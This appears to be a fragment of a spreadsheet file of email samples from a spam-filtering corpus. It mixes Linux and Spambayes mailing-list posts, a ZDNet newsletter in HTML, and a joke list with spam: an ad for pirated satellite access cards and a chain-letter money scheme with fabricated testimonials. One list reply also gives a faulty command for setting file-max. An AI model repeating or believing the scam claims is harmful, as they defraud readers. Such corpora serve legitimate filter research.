 That sounds a lot like "sure programmers aren't needed anymore, don't
 all the new visual thingies mean anyone can do it"[1], or maybe "640k should
 be enough for anyone"[2]
 &gt;
 &gt; "Yeah and add a procedure prolog or eight", I always counter,
 &gt; to be told
 &gt; "On the machines we have these days....."
 &gt;
 &gt; Boggle.
 &gt;
 That's recursion for you.
 C#
 [1] This is often followed by "I know what I'm talking about, I can program
 HTML but I never need to use it"
 [2] Bilge denies he ever said this.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] test sets? 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt; Anthony Baxter wrote
 &gt; I'm currently mangling it by feeding all parts (text, html, whatever 
 &gt; else :) into the filters, as well as both a selected number of headers 
 &gt; (to, from, content-type, x-mailer), and also a list of 
 &gt; (header,count_of_header). This is showing up some nice stuff - e.g. the 
 &gt; X-uidl that stoopid spammers blindly copy into their messages.
 The other thing on my todo list (probably tonight's tram ride home) is
 to add all headers from non-text parts of multipart messages. If nothing
 else, it'll pick up most virus email real quick.
 -- 
 Anthony Baxter     &lt;anthony@interlink.com.au&gt;   
 It's never too late to have a happy childhood.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ****Already own a satellite?  Need a programmed card?****
</t>
  </si>
  <si>
    <t xml:space="preserve">RECIEVE ALL CHANNELS ON YOUR SATELLITE SYSTEM! 1-888-406-4246
 With our Pre-Programmed Satelite Cards get ALL channels
 availible including ALL Pay-Per-View channels!!
 Never miss any of your favorite shows again!
 Our Pre-Programmed Access Cards work on ALL Satellite Systems!
 Our pre-programmed satellite cards are $329.00 and are
 shipped FedEx 2-Day COD Delivery!
 Comes with a 30-Day Money Back Guarantee, 3 Year Warranty
 and a 24-hour tech support line available!
 Take your old card out, replace it with your new one
 and receive everything available!  It's that easy!
 -------------------------------------------------------------
 Order yours TODAY by calling 1-888-406-4246
 This message will only be sent to you once. 
 You will not receive any future updates.
 Any questions please call 1-888-406-4246.
 022l3
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Errr... not to be pedantic or anything, but this is called "omit one
 testing" or OOT in the literature IIRC. Helpful in case you're searching for
 additional information, say at http://citeseer.nj.nec.com/ for instance.
 David LeBlanc
 Seattle, WA USA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</si>
  <si>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href="http://clickthru.online.com/Click?q=dd-tpm0QzWMAbwolvLGZP85eXsJh-PR"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href="http://clickthru.online.com/Click?q=f3-LjwgQJOs8dqeIkxCs3CyJqsjeorR"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19, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;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&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;&lt;a href="http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2874762,00.html
 "&gt;
 &lt;b&gt;Hey, thief! This laptop is locked&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Try stealing my notebook and &lt;b&gt;Caveo Anti-Theft&lt;/b&gt; will yell at you louder and louder -- before resorting to an unstoppable, ear-piercing screech. It's motion detection on a PC Card.&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjTZPn901Hg3F-erCpGY9iR" &gt;
 &lt;b&gt;And it's virtually foolproof&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQTqzqmQb3Rl28NRQSnqQPR" &gt;&lt;b&gt;Also: Start-up has locks for Secure Notebook&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=32-Gx5IIrQi8BLS9sqDFWVhZSgRXBnR" &gt;Earnings: Breaking the bottom line&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZx2oK_THHOiJGu_NEsnEuR" &gt;Feds set to enforce PC security&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnWYPLR5LT53xlZk0f-IosR" &gt;Movement grows to boost Wi-Fi hot spots&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZXeNyDzRJqwuBXvl3NU2FR" &gt;States may be blocking e-commerce&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJm04gwpdpSjaeTldfVpf4R" &gt;Microsoft's chief lawyer calls it quits&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanVDflOljAlXdIl9Oi-UiyR" &gt;Will Mac users pay for 'Mac experience'?&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0MIpiRPkWr9i_f_B0NLnlR" &gt;HP in top PC slot--for now&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLJOcR9uvgWdT_pfmeDx04R"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src="http://image.com.com/techupdate/i/dfarber.jpg"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size="+1"&gt;&lt;b&gt;Active Directory unbundled&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;B&gt;Microsoft&lt;/B&gt; will begin selling its directory technology as &lt;B&gt;a standalone product&lt;/B&gt; separate from Windows. The move could be seen as Microsoft's attempt to satisfy those that have accused the software giant of monopolistic practices for integrating a multitude of software into its operating system. &lt;B&gt;Sun&lt;/B&gt; and &lt;B&gt;Novell&lt;/B&gt; already offer so-called lightweight directory software, so Microsoft is joining an already thriving marketplace for products that store and manage information about users, computer systems and networking devices.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEJi82osHkvpmtTwxp6DtrR" &gt;&lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 1--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;How much do you build on Linux?&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 A question for IT managers is whether &lt;B&gt;Linux&lt;/B&gt; is ready to move beyond file and Web servers to application and Web services servers. If &lt;B&gt;IBM, Oracle, BEA, Sun, HP&lt;/B&gt; and other vendors have a say, the answer is yes.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWgaJyIUqcd2fqfAgMcXeaiR" &gt;
 &lt;b&gt;Find out why&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 2--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="left"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
 &lt;img src="http://image.com.com/techupdate/i/amello.gif" width="85" height="110" border="0" align="left"&gt;
 &lt;/td&gt;
 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;CRM's dirty little secret&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The goal of CRM is to reduce costs, increase revenues, and boost customer loyalty. But what if your &lt;B&gt;data is dirty&lt;/B&gt;? Tech Update's &lt;B&gt;Adrian Mello&lt;/B&gt; has tips on how companies can cut down on inaccurate and potentially damaging customer data.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=06-fP6uI481hKwtTVomap_vCgSyiL4R" &gt;
 &lt;b&gt;Clean up your act&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- STORY 3 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Get your IT budgets approved&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 An experienced IT manager offers eight tips for getting budgets approved--plus a &lt;B&gt;sample budget&lt;/B&gt; that shows his recommendations in action.  Does your company have a five-year plan for its IT budget?
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N1z0pm5rNQ1U5MauO37xrR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 4 --&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="220" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071702_burkhardt_quote.gif" width="220" height="175" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;P&gt;
 &lt;font size="+1"&gt;&lt;b&gt;How a CTO faced his worst nightmare
 &lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 After Sept. 11, investors worried whether the &lt;B&gt;stock market&lt;/B&gt; would quickly get back to business. &lt;B&gt;NYSE technology chief Roger Burkhardt&lt;/B&gt; was on the job faster than a trader can say "buy." But now Burkhardt and his technology team face a &lt;B&gt;new era of instability&lt;/B&gt; marked by fears of terrorist attacks, corporate accounting scandals, and a stock market meltdown. CNET News.com recently spoke with Burkhardt about the technology challenges the NYSE regularly faces because of the whipsaw movements of the stock market.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrPLwvBdgA8IeOdSKzjX1iR" &gt;
 &lt;b&gt;Read the full interview&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;In what business do we trust?&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In response to my recent column, "&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKBij6jkp0x-EDvznhjonlZR" &gt;&lt;B&gt;Desperately seeking chief ethics officer&lt;/B&gt;&lt;/a&gt;," &lt;B&gt;David Boulton&lt;/B&gt; writes: "We are missing the point when we focus on the executives of corporations and miss the underlying ethic of business in general." Boulton asks how we can possibly trust institutions that reduce human beings "to assets whose behaviors are fair game to manipulate?"
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0zdKnCnKw24YOLpk6Td6dR" &gt;
 &lt;b&gt;Read his call for a new ethic&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 6--&gt;
 &lt;!--&lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071602winbook.jpg" width="220" height="207" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Fact and fiction in the Web services debate&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Iona Technologies CEO &lt;b&gt;Barry Morris&lt;/b&gt; says the battle between .Net and Java isn't important. Web services' future is held
 hostage by an unresolved debate over &lt;b&gt;industry standards&lt;/b&gt;.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOL3Y3gjLZw3RXvLF34ULXuR" &gt;
 &lt;b&gt;Read the full review&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;--&gt;
 &lt;!-- Write to me --&gt;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href="http://clickthru.online.com/Click?q=84-CCOyQ60FV7pnTgVZsihsBSWgp7yR"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href="http://clickthru.online.com/Click?q=9a-b6_GQTMpSkXOga7Figi7yr9FKgnR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;FEATURE&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2874688,00.html
 "&gt;
 &lt;b&gt;New connections reshape the PC&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Big changes are coming in PC design. &lt;B&gt;Meta Group&lt;/B&gt; thinks enterprises should begin to plan how these changes will affect existing projects and purchasing plans.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature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href="http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2874493,00.html
 "&gt;
 &lt;b&gt;The road to the real tech recovery&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Have falling stock prices and the tech meltdown got you down? &lt;B&gt;Eric Knorr&lt;/B&gt; argues that the road to the real tech recovery is paved with back-to-basics innovation.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download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href="http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2874679,00.html
 "&gt;
 &lt;b&gt;Gaga for Google? When results don't count&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 When Dan Farber's Web search on a leading IT exec came up almost empty, he was forced to rethink his use of search engines.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size="-2"&gt;&lt;b&gt;MONITORS&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=af--dB8QLp7D-RuHm7ydDX7NdmUVSeR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/040802_monitors.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WstJFBXj4kHF6q-jPexAyR" style="text-decoration:none"&gt;&lt;b&gt;A Porsche you can afford&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
 Samsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P, a sleek, 17-inch LCD.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPspJIMR09ie23s1N87hJlR" style="text-decoration:none"&gt;Read review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Monitors&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDDxiWCQ9b0QzbMuLbLad4R" style="text-decoration:none"&gt;Samsung SyncMaster 151S&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rIIxDMetnhKQcaLlAI6OrR" style="text-decoration:none"&gt;NEC MultiSync 1550V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=18-WhdzI987phmyODmTiMEyR1N675iR" style="text-decoration:none"&gt;Envision EN-5100e&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKxNl3OHFkVdngyV7VDjSPR" style="text-decoration:none"&gt;Samsung SyncMaster 570 V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=42-rF7cIPKGJAvxjB-pz3F7_4EMIrdR" style="text-decoration:none"&gt;Samsung SyncMaster 955 DF&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJxs_rx5CEYjKHbtbXYzHRR" style="text-decoration:none"&gt;More popular monitors&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=6d-e8plIDEzJCY9_-K7Bc1bJBykEmZR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK2G6nnWXl6gJLkjCXMZHnR" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M2ZiQ709w3V0z6qjySJGeR" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ac-RbKtQ0UJo8nVpCldWfGJ0kSyVjyR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c1-PIljQpW7B4l3FU2wiOPYOLipujlR" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;/b&gt;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href='http://clickthru.online.com/Click?q=d7-wkOZr8WPyhAJDv9rm34yf6pGyEJKARRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy13zaauep1kOqFb2GVaGyR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jxOqW38eVvurMPGPxZ6RlR"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href="http://clickthru.online.com/Click?q=16-T_cjI4cTyIFyifJDblRuaBDxRU4R" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzwpGvgzkxwzk0xBfd-8WrR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idnjk7xPo6ieVXCHnpqL0wRR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJjcIiNDrcqm86ccJ_2d2ZR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeW6ZSr65FEzceCGFySNP8dR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIPiqG3vHYq9IO3JewkhBpuR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdKmPV49e3r1yZeU_u_KnPR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUQ1CwylmrWLXZBXqONOVnR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZQwRpW4Kc5w8PF_jEuwteR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-19" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=d5-p-Si-vLA49NYYEogRFir-4gvy9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
 &gt;  OK, I guess that sysctl.conf is the best way of setting 
 &gt; 
 &gt;     /proc/sys/fs/file-max
 cat 20480 &gt; /proc/sys/fs/file-max
 ta dah...
 Vin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New Medications.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Rob Windsor &lt;windsor@warthog.com&gt;
 Forwarded-by: "Rich Holland" &lt;holland@guidancetech.com&gt;
 Forwarded-by: Diane &lt;djbscm@interkan.net&gt;
 S t . M o m ' s W o r t
 Plant extract that treats mom's depression by rendering
 preschoolers unconscious for up to six hours.
 E m p t y N e s t r o g e n
 Highly effective suppository that eliminates melancholy by
 enhancing the memory of how awful they were as teenagers and
 how you couldn't wait till they moved out.
 P e p t o b i m b o
 Liquid silicone for single women. Two full cups swallowed
 before an evening out increases breast size, decreases
 intelligence, and improves flirting.
 D u m e r o l
 When taken with Peptobimbo, can cause dangerously low I.Q.
 causing enjoyment of country western music.
 F l i p i t o r
 Increases life expectancy of commuters by controlling road
 rage and the urge to flip off other drivers.
 A n t i b o y o t i c s
 When administered to teenage girls, is highly effective in
 improving grades, freeing up phone lines, and reducing money
 spent on make-up.
 M e n i c i l l i n
 Potent antiboyotic for older women. Increases resistance to
 such lines as, "You make me want to be a better person ... can
 we get naked now?"
 B u y a g r a
 Injectable stimulant taken prior to shopping. Increases
 potency and duration of spending spree.
 E x t r a S t r e n g t h B u y-O n e-A l l
 When combined with Buyagra, can cause an indiscriminate
 buying frenzy so severe the victim may even come home with a
 Donnie Osmond CD or a book by Dr. Laura.
 J a c k A s s p i r i n
 Relieves the headache caused by a man who can't remember your
 birthday, anniversary or phone number.
 A n t i - t a l k s i d e n t
 A spray carried in a purse or wallet to be used on anyone too
 eager to share their life stories with total strangers.
 R a g a m e t
 When administered to a husband, provides the same irritation
 as ragging on him all weekend, saving the wife the time and
 trouble of doing it herself.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Mail sent to ILUG
</t>
  </si>
  <si>
    <t xml:space="preserve">is it really necessary to send these to the list?
 ----- Original Message -----
 From: &lt;ilug-admin@linux.ie&gt;
 To: &lt;ilug@linux.ie&gt;
 Sent: Tuesday, August 20, 2002 8:54 AM
 Subject: [ILUG] Mail sent to ILUG
 &gt; Your mail to 'ILUG' with the subject:
 &gt;
 &gt;     Audio plays a critical part in the Web surfer's consciousness rvxa
 &gt;
 &gt; Is being held until the list moderator can review it for approval.
 &gt;
 &gt; The reason it is being held:
 &gt;
 &gt;     Suspicious header
 &gt;
 &gt; Either the message will get posted to the list, or you will receive
 &gt; notification of the moderator's decision.
 &gt;
 &gt; --
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 information.
 &gt; List maintainer: listmaster@linux.ie
 &gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: As Seen on National TV
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Friends &amp; Future Millionaire:
 Invest in technology that will make you
 money.
 AS SEEN ON NATIONAL TV:
 You can make over half million dollars every 4 to 5
 months from
 your home? A one time investment of only
 $25 U.S. Dollars
 Puts you on the road to financial success.
 ALL THANK'S TO THE COMPUTER AGE
 AND THE
 INTERNET!
 You can be A MILLIONAIRE LIKE OTHERS
 WITHIN A YEAR!!!
 Before you say "Bull". Please  read  the
 following. This is the
 Letter you have been hearing about on the
 news lately. Due to
 The popularity of this letter on the Internet.
 A national weekly
 News program recently devoted an intire
 show to the investigation of this
 Program described below, to see if it really
 can make people money.
 The show also investigated whether or not
 the program was legal.
 Their findings proved once and for that
 there are "absolutely  NO Laws
 Prohibiting the participation in the program
 and if people can follow
 The simple instructions, they are bound to
 make some mega bucks
 With only $25 out of pocket cost". DUE TO
 THE RECENT INCREASE
 OF POPULARITY &amp; RESPECT THIS
 PROGRAM HAS ATTAINED,
 IT IS CURRENTLY WORKING BETTER
 THAN EVER.
 This is what one had to say: "Thanks to this
 profitable
 Opportunity. I was approached many times
 before but each
 Time I passed on it. I am so glad I finally
 joined just to see
 What one could expect in return for the
 minimal effort and
 Money required. To my astonishment, I
 received a total of
 $610,470.00 in 21 weeks, with money still
 coming in."
 Pam Hedland, Fort Lee, New Jersey.
 Here is another testimonial: "This program
 has been around
 For a long time but I never believed in it.
 But one day when I
 Received this again in the mail I decided to
 gamble my $25 on
 It. I followed the simple instructions and
 walaa .. 3 weeks
 Later the money started to come in. First
 month I only made
 $240.00 but the next 2 months after that I
 made a total of $290,000.00
 so far, in the past 8 months by re-entering
 the program, I have made over
 $710,000.00 and I am playing it again. The
 key to success in this program
 is to follow the simple steps and NOT
 change anything. "More
 testimonials later but first,
